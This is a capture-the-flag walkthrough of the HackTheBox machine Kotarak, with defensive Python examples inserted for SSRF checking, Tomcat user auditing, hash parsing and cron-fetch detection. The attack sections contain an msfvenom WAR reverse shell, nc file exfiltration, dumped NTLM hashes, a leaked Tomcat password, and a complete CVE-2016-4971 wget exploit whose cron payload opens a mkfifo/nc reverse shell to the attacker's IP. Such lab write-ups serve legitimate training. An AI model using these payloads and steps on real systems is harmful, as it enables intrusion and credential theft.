1 Scanning and information gathering

A plain nmap -A scan. Port 8009 won't open; 8080 is Tomcat, but we have no credentials.
Not much useful information, so the port scan was very likely incomplete. Rescan every port with the fast scanner:

masscan -p1-65535,U:1-65535 10.10.10.55 --rate=1000 -e tun0

One extra port shows up: 60000. Browsing to it, it is a search-box tool that fetches and displays arbitrary HTTP pages.

Running dirbuster against port 60000 shows a server-status path.
Through the search box, view the server status of the site itself:

127.0.0.1:60000/server-status

This reveals that the target runs a port 888 that is not exposed externally. Lesson learned: when pentesting, always ask whether there are internal-only ports.

Alternatively, use wfuzz to check for possible internal-only ports. The --hl=2 was added afterwards to hide the empty results. Several more internal-only ports turn up; look at each in turn.

Only 888 seems to have anything of interest, though: it lists backup data.

C:\root> wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Total requests: 65535

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000022:   200        4 L      4 W      62 Ch       "22"
000000090:   200        11 L     18 W     156 Ch      "90"
000000110:   200        17 L     24 W     187 Ch      "110"
000000200:   200        3 L      2 W      22 Ch       "200"
000000320:   200        26 L     109 W    1232 Ch     "320"
000000888:   200        78 L     265 W    3955 Ch     "888"
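The search box on port 60000 is a server-side request forgery: url.php fetches whatever path= names, including localhost, which is exactly what exposes the internal-only ports. The following Python is an added example, not code from the original post or from the target: it shows the check such a fetch feature should perform, deciding on the resolved address rather than the hostname text so that localhost, an IP literal, or a DNS name pointing into 10.x are all refused. FAKE_DNS and fake_resolver are a constructed offline stand-in for DNS; check_fetch_target and is_blocked_address are this example's own names.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Address ranges a "fetch this URL for me" feature should never be allowed to
# reach: loopback, RFC 1918 private space, link-local, unspecified, IPv6 ULA.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_blocked_address(addr):
    """True if the IP string falls inside any blocked range."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in BLOCKED_NETWORKS)


def _dns_resolve(host):
    """Resolve a hostname to every address it maps to (real DNS lookup)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_fetch_target(url, resolver=_dns_resolve):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (allowed, reason). The decision is made on the resolved
    addresses, not on the hostname spelling, so "localhost", "[::1]" and a
    DNS name that points at 10.0.3.x are all caught the same way.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    try:
        # An IP literal needs no lookup; anything else is resolved.
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return False, "host does not resolve"
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if is_blocked_address(addr):
            return False, "%s resolves to blocked address %s" % (host, addr)
    return True, "ok"


# Constructed resolver for offline use; 203.0.113.0/24 is documentation space.
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "intranet.example": ["10.0.3.133"],
    "www.example.org": ["203.0.113.10"],
}


def fake_resolver(host):
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise OSError("no such host")


if __name__ == "__main__":
    for u in ("http://localhost:888?doc=backup",
              "http://intranet.example/",
              "http://[::1]:888/",
              "http://www.example.org/page",
              "ftp://www.example.org/"):
        print(u, "->", check_fetch_target(u, fake_resolver))
```

The check must be applied to the address the HTTP client actually connects to (and again after any redirect), otherwise a name that resolves differently on the second lookup, or a redirect from a public host to http://127.0.0.1:888/, gets around it.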

2 Getting the password from the hidden port

The file size is not 0, so there is content, but when I click into it nothing shows. What is visible is the path: ?doc=backup.
Back in the search box, I tried all sorts of variants. None work; all blank:

http://localhost:888/?doc=backup
http://localhost:888/doc=backup
http://localhost:888?doc=backup

But for the third one, although the page shows nothing, if I take the URL the page requested and try it with curl, it does show the content and the password. No idea why..?????

C:\root> curl http://10.10.10.55:60000/url.php?path=http%3A%2F%2Flocalhost%3A888%3Fdoc%3Dbackup
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
</tomcat-users>
C:\root> 
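What came back is Tomcat's tomcat-users.xml, and the account in it holds manager-script and manager-gui, the roles that let a caller deploy a WAR. The following Python is an added example, not from the original post: an audit that parses a file of this shape, lists which users hold deployment or admin roles, and flags passwords stored as plain literals. SAMPLE_TOMCAT_USERS is a constructed file in the same layout with placeholder passwords; PRIVILEGED_ROLES, audit_tomcat_users and deployers are this example's own names, and the digest heuristic in _looks_digested is an assumption about the "salt$iterations$hash" form a Tomcat CredentialHandler writes.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the same shape as the file recovered above; the
# passwords are placeholders, not the value from the target.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <!-- example block that ships with Tomcat; a comment, so never loaded -->
  <!--
  <role rolename="tomcat"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  -->
  <role rolename="manager-gui"/>
  <user username="admin" password="PLACEHOLDER-PASSWORD"
        roles="manager,manager-gui,admin-gui,manager-script"/>
  <user username="viewer" password="PLACEHOLDER-2" roles="manager-status"/>
</tomcat-users>
"""

# Roles that allow deploying or administering web applications. A holder of
# any of these can push arbitrary code (for example a WAR) into the container.
PRIVILEGED_ROLES = {"manager", "manager-gui", "manager-script",
                    "manager-jmx", "admin-gui", "admin-script"}


def _local(tag):
    """Strip the XML namespace so tags compare as plain names."""
    return tag.rsplit("}", 1)[-1]


def _looks_digested(pw):
    # Heuristic (assumption): a hex digest of SHA-1/SHA-256/SHA-512 length,
    # optionally prefixed "salt$iterations$". Anything else is a literal.
    tail = pw.rsplit("$", 1)[-1].lower()
    return len(tail) in (40, 64, 128) and all(c in "0123456789abcdef" for c in tail)


def audit_tomcat_users(xml_text):
    """Return one finding per <user>: name, privileged roles, plaintext flag.

    Entries inside XML comments are ignored by the parser, which is exactly
    how Tomcat treats them, so the shipped sample users do not appear.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        findings.append({
            "user": el.get("username"),
            "privileged_roles": sorted(roles & PRIVILEGED_ROLES),
            "plaintext_password": not _looks_digested(el.get("password", "")),
        })
    return findings


def deployers(xml_text):
    """Names of users who can deploy code into the container."""
    return [f["user"] for f in audit_tomcat_users(xml_text) if f["privileged_roles"]]


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f)
```

Run this over a real file and every name it returns from deployers() is an account whose password is equivalent to code execution on the server; the page itself demonstrates why that file must not be readable through any web-reachable path.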

3 Getting a shell through Tomcat

With a username and password we can now log into the Tomcat we couldn't get into before; the login path is given too: manager/html.
For attacking Tomcat, see the HackTheBox machine Jerry. Tomcat is quite common in the wild; just a few days ago a friend hit Tomcat in an engagement and asked me how to take it..

Upload: build the package

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -f war > tom.war

After uploading, click on our package, start the listener, and the shell comes in.
Upgrade to a tty: python -c 'import pty; pty.spawn("/bin/bash")'

We can see there is a user atanas; user.txt is in their directory, but we have no permission to read it.
In tomcat's home directory we can see a .bin and a .dit file.

Copy both to our machine with nc, receiving locally. Name them whatever you like:

nc 10.10.14.11 4444 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
nc -nlvp 4444 > 666.bin

4 Parsing the domain files

These two are domain files that store the domain's information (the NTDS database and the SYSTEM hive, as the -ntds and -system options show),
and they can be parsed with the tool bundled in Kali: impacket-secretsdump -system 666.bin -ntds 666.dit LOCAL

C:\root> impacket-secretsdump -system 666.bin -ntds 666.dit LOCAL
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from 666.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Cleaned-up hashes

Administrator:e64fe0f24ba2489c05e64354d74ebd11
krbtgt:ca1ccefcb525db49828fbb9d68298eee
atanas:2b576acbe6bcfda7294d6bd18041b8fe
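The clean-up step above can be scripted, and a defender reading the same dump wants a few flags alongside it. The following Python is an added example, not from the original post: it parses secretsdump's domain\uid:rid:lmhash:nthash lines (SAMPLE_DUMP reuses a subset of the output above), skips machine accounts, drops accounts whose NT hash is the hash of the empty string, and flags the built-in Administrator and krbtgt RIDs and any account that still has an LM hash stored. parse_dump, cracking_list and flags are this example's own names.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (no password set)

# A subset of the secretsdump output shown above, progress lines included.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from 666.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
"""

# domain\ prefix is optional; the trailing ":::" is where secretsdump would
# place Kerberos keys / history in other output modes.
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::")


def parse_dump(text):
    """Turn dump lines into records; lines that are not hashes are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["rid"] = int(d["rid"])
        d["machine"] = d["user"].endswith("$")   # computer accounts
        d["lm_stored"] = d["lm"] != EMPTY_LM
        d["empty_password"] = d["nt"] == EMPTY_NT
        records.append(d)
    return records


def cracking_list(records):
    """user:nthash lines for the accounts worth auditing: human accounts with
    a real password (machine accounts have long random passwords; an empty NT
    hash has nothing to crack)."""
    return ["%s:%s" % (r["user"], r["nt"]) for r in records
            if not r["machine"] and not r["empty_password"]]


def flags(records):
    """Per-account findings a defender would act on."""
    out = {}
    for r in records:
        f = []
        if r["empty_password"]:
            f.append("empty password (typically a disabled Guest; verify the account is disabled)")
        if r["lm_stored"]:
            f.append("LM hash stored; LM is trivially crackable")
        if r["rid"] == 500:
            f.append("built-in Administrator (RID 500)")
        if r["rid"] == 502:
            f.append("krbtgt (RID 502): KDC key, rotate twice after any compromise")
        if f:
            out[r["user"]] = f
    return out


if __name__ == "__main__":
    recs = parse_dump(SAMPLE_DUMP)
    print("\n".join(cracking_list(recs)))
    for user, items in flags(recs).items():
        print(user, "->", "; ".join(items))
```

On the dump above, cracking_list() produces exactly the three lines the post lists by hand, and flags() singles out Guest, Administrator and krbtgt.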

https://crackstation.net/ I usually try this site first since it's quick, though you need that kind of network access, you know what I mean. john, hashcat and the like also work.

The admin and atanas hashes both crack. But when tried, only admin's password works for switching to atanas; switch to the atanas user.

5 Privilege escalation

In the root directory we find this wget access log: 10.0.3.133 comes to the target to fetch a file.
ifconfig shows .133 is an IP on another LAN segment, 10.0.3.x:

atanas@kotarak-dmz:/root$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:2a:2d
          inet addr:10.10.10.55  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:2a2d/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:2a2d/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2680682 errors:0 dropped:57 overruns:0 frame:0
          TX packets:2211241 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:452911965 (452.9 MB)  TX bytes:443481152 (443.4 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160637 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160637 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:11440611 (11.4 MB)  TX bytes:11440611 (11.4 MB)

lxcbr0    Link encap:Ethernet  HWaddr 00:16:3e:00:00:00
          inet addr:10.0.3.1  Bcast:0.0.0.0  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe00:0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:903 errors:0 dropped:0 overruns:0 frame:0
          TX packets:850 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:51717 (51.7 KB)  TX bytes:56116 (56.1 KB)
atanas@kotarak-dmz:/home$ cd /root
atanas@kotarak-dmz:/root$ ls
app.log  flag.txt
atanas@kotarak-dmz:/root$ cat app.log
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
atanas@kotarak-dmz:/root$ 

A fetch every two minutes: clearly a cron job, and those are usually run as root.
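The reasoning above (one client, one path, a fixed two-minute cadence, a Wget/1.16 user agent, and a 404 every time) is the kind of pattern a log review should surface automatically: a privileged scheduled task pulling from a host it does not control is a dependency an attacker on that path can abuse. The following Python is an added example, not from the original post: it parses combined-format lines like those in app.log, groups requests by client, path and user agent, reports groups that recur at a regular period, and flags a wget older than 1.18, the release that fixed CVE-2016-4971 (the CVE cited in the exploit header further down this page). The first three SAMPLE_LOG lines are the ones from app.log; the fourth is constructed browser noise. parse_log, find_scheduled_fetches and wget_version are this example's own names.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$')

# Three lines from app.log above plus one constructed ordinary browser hit.
SAMPLE_LOG = """\
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.7 - - [20/Jul/2017:22:51:15 -0400] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (constructed)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
"""


def parse_log(text):
    """Parse combined-format lines; lines that do not match are skipped."""
    recs = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["time"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
        recs.append(d)
    return recs


def wget_version(ua):
    """(major, minor) from a Wget user agent, or None for anything else."""
    m = re.match(r"Wget/(\d+)\.(\d+)", ua)
    return (int(m.group(1)), int(m.group(2))) if m else None


def find_scheduled_fetches(records, min_hits=3, jitter_s=5):
    """Report (client, path, user agent) groups that recur at a steady period.

    A steady period with at least min_hits occurrences is the signature of a
    cron job; the caller can then check which user owns that job. The wget
    flag marks versions before 1.18, the release that fixed CVE-2016-4971.
    """
    groups = defaultdict(list)
    for r in records:
        groups[(r["client"], r["path"], r["ua"])].append(r)
    hits = []
    for (client, path, ua), rs in groups.items():
        if len(rs) < min_hits:
            continue
        times = sorted(r["time"] for r in rs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) > jitter_s:
            continue  # irregular: a human or a retry burst, not a schedule
        ver = wget_version(ua)
        hits.append({
            "client": client,
            "path": path,
            "ua": ua,
            "hits": len(rs),
            "period_s": round(sum(gaps) / len(gaps)),
            "statuses": sorted({r["status"] for r in rs}),
            "wget_pre_1_18": ver is not None and ver < (1, 18),
        })
    return hits


if __name__ == "__main__":
    for h in find_scheduled_fetches(parse_log(SAMPLE_LOG)):
        print(h)
```

The 404 status is the detail to act on: the scheduled fetch never gets the file it asks for, so whoever answers that request decides what the client does next; an up-to-date wget and a job that runs as an unprivileged user remove most of the risk.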

And GNU wget 1.16 has a known, easily found vulnerability; the advisory is referenced in the header of the script further down.
So this vulnerability can be used to escalate privileges.

The gist of the vulnerability is an FTP redirect. The target fetches its archive file and gets a 404; with a script we redirect it to an FTP server started on our Kali box, it downloads our forged malicious .wgetrc config, and then runs the malicious cron job code we supply.

First, follow the steps in the advisory. Build the malicious config on our Kali box, then pip install pyftpdlib, then start the server with python -m pyftpdlib -p21:

C:\root\Downloads> mkdir /tmp/ftptest
C:\root\Downloads> cd /tmp/ftptest
C:\tmp\ftptest> ls
C:\tmp\ftptest> cat <<_EOF_>.wgetrc
> post_file = /etc/shadow
> output_document = /etc/cron.d/wget-root-shell
> _EOF_
C:\tmp\ftptest> pip install pyftpdlib
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting pyftpdlib
  Downloading pyftpdlib-1.5.6.tar.gz (188 kB)
     |████████████████████████████████| 188 kB 4.9 kB/s
Building wheels for collected packages: pyftpdlib
  Building wheel for pyftpdlib (setup.py) ... done
  Created wheel for pyftpdlib: filename=pyftpdlib-1.5.6-py2-none-any.whl size=125597 sha256=9b90fada9d9a45ae96642c815d714446bbb69e4e3d6b07863034d7b92c492f61
  Stored in directory: /root/.cache/pip/wheels/31/10/b5/c6b2f04e18f1227d0dc45062815ad52ed359ec2e8d6c0faa55
Successfully built pyftpdlib
Installing collected packages: pyftpdlib
Successfully installed pyftpdlib-1.5.6
WARNING: You are using pip version 20.0.2; however, version 20.1 is available.
You should consider upgrading via the '/usr/bin/python -m pip install --upgrade pip' command.
C:\tmp\ftptest> cat .wgetrc
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell
C:\tmp\ftptest> python -m pyftpdlib -p21

Modify the script from the advisory: replace the cron job with the reverse-shell command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 5555 >/tmp/f, and change the listening IP: the ftp host becomes our own.

#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#

import SimpleHTTPServer
import SocketServer
import socket

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        # This takes care of sending .wgetrc
        print "We have a volunteer requesting " + self.path + " by GET :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
        self.send_response(301)
        new_path = '%s' % ('ftp://anonymous@%s:%s/.wgetrc' % (FTP_HOST, FTP_PORT))
        print "Sending redirect to %s \n" % (new_path)
        self.send_header('Location', new_path)
        self.end_headers()

    def do_POST(self):
        # In here we will receive extracted file and install a PoC cronjob
        print "We have a volunteer requesting " + self.path + " by POST :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

        print "Sending back a cronjob script as a thank-you for the file..."
        print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(ROOT_CRON)

        print "\nFile was served. Check your root hash receiving in your 8888 web server in a minute! :) \n"
        return

HTTP_LISTEN_IP = '10.0.3.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.14.11'
FTP_PORT = 21

ROOT_CRON = "* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 5555 >/tmp/f \n"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
    print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
    print "FTP is down :( Exiting."
    exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

handler.serve_forever()

Transfer this script to the target.
Running it fails with a permission error, since a non-root user cannot bind ports below 1024. authbind gets around that, and it happens to be installed on the target.

atanas@kotarak-dmz:/root$ chmod 777 wget.py
atanas@kotarak-dmz:/root$ authbind python wget.py

Start the listener. Two minutes later the root shell arrives.

hackthebox - kotarak (topics: information gathering and hidden ports, Tomcat upload, domain file parsing, wget-gnu 1.16 privilege escalation)
